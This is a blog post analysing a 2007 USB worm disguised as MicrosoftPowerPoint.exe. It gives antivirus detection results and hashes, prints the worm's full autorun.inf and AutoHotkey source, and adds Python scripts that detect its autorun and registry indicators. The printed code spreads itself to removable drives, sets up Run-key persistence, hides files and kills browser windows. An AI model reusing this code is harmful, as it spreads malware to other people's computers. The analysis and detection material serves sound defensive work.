Sunday, October 7, 2007

The MicrosoftPowerPoint.exe virus

Lately I keep finding a virus called MicrosoftPowerPoint.exe on friends' computers and USB sticks. It is really more of a trojan; it launches itself through autorun.inf...

Below are the scan results from a number of antivirus engines:

File MicrosoftPowerPoint.exe received on 2007.10.07 06:41:45 (CET)

Antivirus         | Version        | Last update | Result
------------------|----------------|-------------|--------------------------------------------------
AhnLab-V3         | 2007.10.6.0    | 2007.10.05  | Win32/Muha.worm.462050
AntiVir           | 7.6.0.20       | 2007.10.05  | DR/Agent.aoe.1
Authentium        | 4.93.8         | 2007.10.05  | is a security risk or a "backdoor" program
Avast             | 4.7.1051.0     | 2007.10.06  | Win32:Agent-HYM
AVG               | 7.5.0.488      | 2007.10.06  | Worm/Small.2.F
BitDefender       | 7.2            | 2007.10.07  | Trojan.Agent.AACH
CAT-QuickHeal     | 9.00           | 2007.10.06  | Worm.Muha.a
ClamAV            | 0.91.2         | 2007.10.07  | Trojan.Mozban
DrWeb             | 4.44.0.09170   | 2007.10.06  | Win32.HLLW.Offring
eSafe             | 7.0.15.0       | 2007.10.04  | Win32.Trojan
eTrust-Vet        | 31.2.5190      | 2007.10.06  | Win32/AHKHeap.A
Ewido             | 4.0            | 2007.10.06  | -
FileAdvisor       | 1              | 2007.10.07  | High threat detected
Fortinet          | 3.11.0.0       | 2007.10.07  | Misc/AutoHotKey
F-Prot            | 4.3.2.48       | 2007.10.06  | W32/Worm!adbb
F-Secure          | 6.70.13030.0   | 2007.10.06  | Worm.Win32.Muha.a
Ikarus            | T3.1.1.12      | 2007.10.07  | Worm.Win32.Muha.a
Kaspersky         | 7.0.0.125      | 2007.10.07  | Worm.Win32.Muha.a
McAfee            | 5135           | 2007.10.05  | W32/AHKHeap
Microsoft         | 1.2908         | 2007.10.07  | -
NOD32v2           | 2576           | 2007.10.07  | Win32/AHKHeap.A
Norman            | 5.80.02        | 2007.10.05  | Smalltroj.BHFI
Panda             | 9.0.0.4        | 2007.10.06  | W32/AHKHeap.A.worm
Prevx1            | V2             | 2007.10.07  | -
Rising            | 19.43.50.00    | 2007.10.06  | Trojan.Win32.Agent.aoe
Sophos            | 4.22.0         | 2007.10.06  | W32/AHKHeap-A
Sunbelt           | 2.2.907.0      | 2007.10.06  | -
Symantec          | 10             | 2007.10.07  | Trojan.Dropper
TheHacker         | 6.2.6.078      | 2007.10.06  | W32/Muha.a
VBA32             | 3.12.2.4       | 2007.10.05  | Worm.Win32.Muha.a
VirusBuster       | 4.3.26:9       | 2007.10.06  | Worm.DR.Muha.C
Webwasher-Gateway | 6.0.1          | 2007.10.05  | Trojan.Agent.aoe.1

Additional information
File size: 462050 bytes
MD5: 4f30003916cc70fca3ce6ec3f0ff1429
SHA1: 7a12afdc041a03da58971a0f7637252ace834353
Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=4f30003916cc70fca3ce6ec3f0ff1429


Since most antivirus engines already detect it, it is not much of a threat.

From my testing, the virus consists of two files. Here is their code:

autorun.inf

[Autorun]
open=MicrosoftPowerPoint.exe
shellexecute=MicrosoftPowerPoint.exe
shell\Auto\command=MicrosoftPowerPoint.exe
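As an added example (my own code, not part of the original post and not the worm's), the following Python script triages a removable drive the way a responder would: it parses autorun.inf, lists every directive that launches a program (open, shellexecute and shell\<verb>\command, all three of which this sample uses), hashes the file each one points at and compares the result with the MD5/SHA1 listed above. The drive layout in demo() is constructed in a temporary directory with a placeholder executable; the function and constant names are my own.

```python
"""Offline triage of an autorun.inf found on a removable drive.

Added example, not part of the original post and not the worm's code. It parses
the autorun.inf directives that launch a program, hashes the file they point at
on the drive and compares the result with the MD5/SHA1 listed in the post.
"""
import hashlib
import os
import tempfile

# Hashes of MicrosoftPowerPoint.exe as reported in the post.
KNOWN_MD5 = "4f30003916cc70fca3ce6ec3f0ff1429"
KNOWN_SHA1 = "7a12afdc041a03da58971a0f7637252ace834353"

# [Autorun] keys that make Windows run a program: open / shellexecute directly,
# shell\<verb>\command via the drive's context menu (this sample uses all three).
LAUNCH_KEYS = ("open", "shellexecute")


def _first_token(value):
    """Return the program name from a directive value, dropping any arguments."""
    value = value.strip()
    if value.startswith('"'):                       # quoted path, may contain spaces
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split()[0] if value else ""


def parse_autorun(text):
    """Return {directive: program} for every launch directive in an autorun.inf.

    Parsed by hand rather than with configparser: section and key names are
    case-insensitive on Windows and keys may contain backslashes.
    """
    launch, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            launch[key] = _first_token(value)
    return launch


def hash_file(path):
    """MD5 and SHA1 hex digests of a file, read in chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def triage_drive(root):
    """Report every program autorun.inf under root would launch, with hashes.

    'known_sample' is True when the hashes match the sample described in the post.
    """
    inf = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf):
        return []
    with open(inf, "r", encoding="utf-8", errors="replace") as fh:
        launch = parse_autorun(fh.read())
    report = []
    for directive, target in launch.items():
        path = os.path.join(root, target.replace("\\", os.sep))
        entry = {"directive": directive, "target": target, "exists": os.path.isfile(path)}
        if entry["exists"]:
            md5, sha1 = hash_file(path)
            entry.update(md5=md5, sha1=sha1,
                         known_sample=(md5 == KNOWN_MD5 or sha1 == KNOWN_SHA1))
        report.append(entry)
    return report


def demo():
    """Constructed fake drive in a temp directory; the .exe is a placeholder, not the sample."""
    root = tempfile.mkdtemp(prefix="fakedrive_")
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[Autorun]\nopen=MicrosoftPowerPoint.exe\n"
                 "shellexecute=MicrosoftPowerPoint.exe\n"
                 "shell\\Auto\\command=MicrosoftPowerPoint.exe\n")
    with open(os.path.join(root, "MicrosoftPowerPoint.exe"), "wb") as fh:
        fh.write(b"placeholder bytes, not the real sample")
    return triage_drive(root)


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Point triage_drive() at the root of a mounted drive to use it for real. Windows treats autorun.inf section and key names case-insensitively, so the parser lowercases both; a file that spells the section [AUTORUN] or uses a shell\Auto\command entry (as this one does) is still caught, and a quoted program path with spaces is handled.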

MicrosoftPowerPoint.exe (the script files it carries; they reference one another under C:\heap41a\, and C:\heap41a\svchost.exe is evidently a renamed AutoHotkey interpreter, since the scripts are AutoHotkey syntax and Fortinet flags the sample as Misc/AutoHotKey)

drivelist (C:\heap41a\driveList.txt, one drive letter per line)

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z


reproduce (C:\heap41a\reproduce.txt)

#notrayicon
#persistent
; Read the drive letters (c..z) from driveList.txt into a pseudo-array
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
; Run the "reproduce" subroutine every 5 seconds
settimer,reproduce,5000
return

reproduce:

; Spreading: for every drive letter, if the drive is removable and ready,
; copy the C:\heap41a\offspring folder (presumably the two files above) onto its root
Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
; Persistence: the "winlogon" value under the Explorer policy Run key starts std.txt
; through the renamed interpreter at logon; if it was removed, write it back
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

script1 (C:\heap41a\script1.txt)

#persistent
#notrayicon
; Run the "ban" subroutine every 2 seconds
settimer,ban,2000
return

ban:
; Check the active window's title; close it and show a message if it is Orkut, YouTube or Firefox.
; For Internet Explorer, also read its Edit controls (the address bar) for "orkut" / "youtube".
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r        OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return


std (C:\heap41a\std.txt, the entry point started from the Run policy key)

#notrayicon
#singleinstance,ignore
; Set CheckedValue under SHOWALL to 0, so choosing "Show hidden files and folders"
; in Folder Options no longer takes effect
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
; Start the window-killing script and the spreading script through the renamed interpreter
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
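The two registry changes made by the reproduce and std scripts (the winlogon value under policies\Explorer\Run, and CheckedValue under SHOWALL) are the easiest things to look for on a machine that has run this sample. As an added example, not part of the original post, the Python below parses a registry export in the Windows Registry Editor (.reg) format and reports both indicators. SAMPLE_REG is a constructed export that mirrors what the scripts write; the key paths and value names come from the scripts above, while parse_reg_export and find_indicators are my own names.

```python
"""Check a Windows registry export (.reg) for the changes the heap41a scripts make.

Added example, not part of the original post. Key paths and value names come
from the 'reproduce' and 'std' scripts; the parser and the sample export are mine.
"""
import re

# Registry locations touched by the scripts (compared case-insensitively).
POLICY_RUN = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer\run"
SHOWALL = (r"hkey_local_machine\software\microsoft\windows\currentversion"
           r"\explorer\advanced\folder\hidden\showall")

# Constructed .reg export mirroring what the scripts write. In this format
# backslashes inside string data are doubled, hence the \\ in the path.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"winlogon"="C:\\heap41a\\svchost.exe C:\\heap41a\\std.txt"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
"Type"="radio"
'''

# "name"=data  or  @=data (the key's default value)
_VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} with paths and names lowercased.

    Only string ("...") and dword: data are decoded; anything else (hex(...)
    binary blobs) is kept as the raw text so nothing is silently dropped.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";")
                or line.startswith("Windows Registry Editor") or line == "REGEDIT4"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = "" if m.group("default") else m.group("name").lower()
        data = m.group("data").strip()
        if data.lower().startswith("dword:"):
            keys[current][name] = int(data[6:], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \\ and \" escapes
        else:
            keys[current][name] = data
    return keys


def find_indicators(keys):
    """List the registry indicators left by the worm's scripts, in a fixed order."""
    findings = []
    # policies\Explorer\Run is the Group Policy run list. Entries here are unusual
    # on a home machine, and this one points into C:\heap41a.
    for name, data in sorted(keys.get(POLICY_RUN, {}).items()):
        if isinstance(data, str) and "heap41a" in data.lower():
            findings.append(f"policy Run value '{name}' launches the worm: {data}")
        else:
            findings.append(f"policy Run value '{name}' present, review: {data}")
    # std.txt writes CheckedValue=0 here; afterwards selecting "Show hidden files
    # and folders" in Folder Options writes 0 instead of 1, so the option no longer works.
    if keys.get(SHOWALL, {}).get("checkedvalue") == 0:
        findings.append("SHOWALL CheckedValue=0: the 'Show hidden files' option has been neutralised")
    return findings


if __name__ == "__main__":
    for line in find_indicators(parse_reg_export(SAMPLE_REG)):
        print(line)
```

To run this against a real machine, export the two keys with reg export (or the whole HKLM\SOFTWARE hive) and feed the file to parse_reg_export(). Cleaning up means deleting the winlogon value and restoring CheckedValue to 1, in addition to removing C:\heap41a and the autorun.inf copies on any USB sticks that were plugged in.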

Worth mentioning: the virus author seems to have a grudge against Firefox. As soon as you open Firefox, a message box pops up:
I Dont hate Mozilla but use IE or Else

It does seem rather aimed at Firefox... heh.
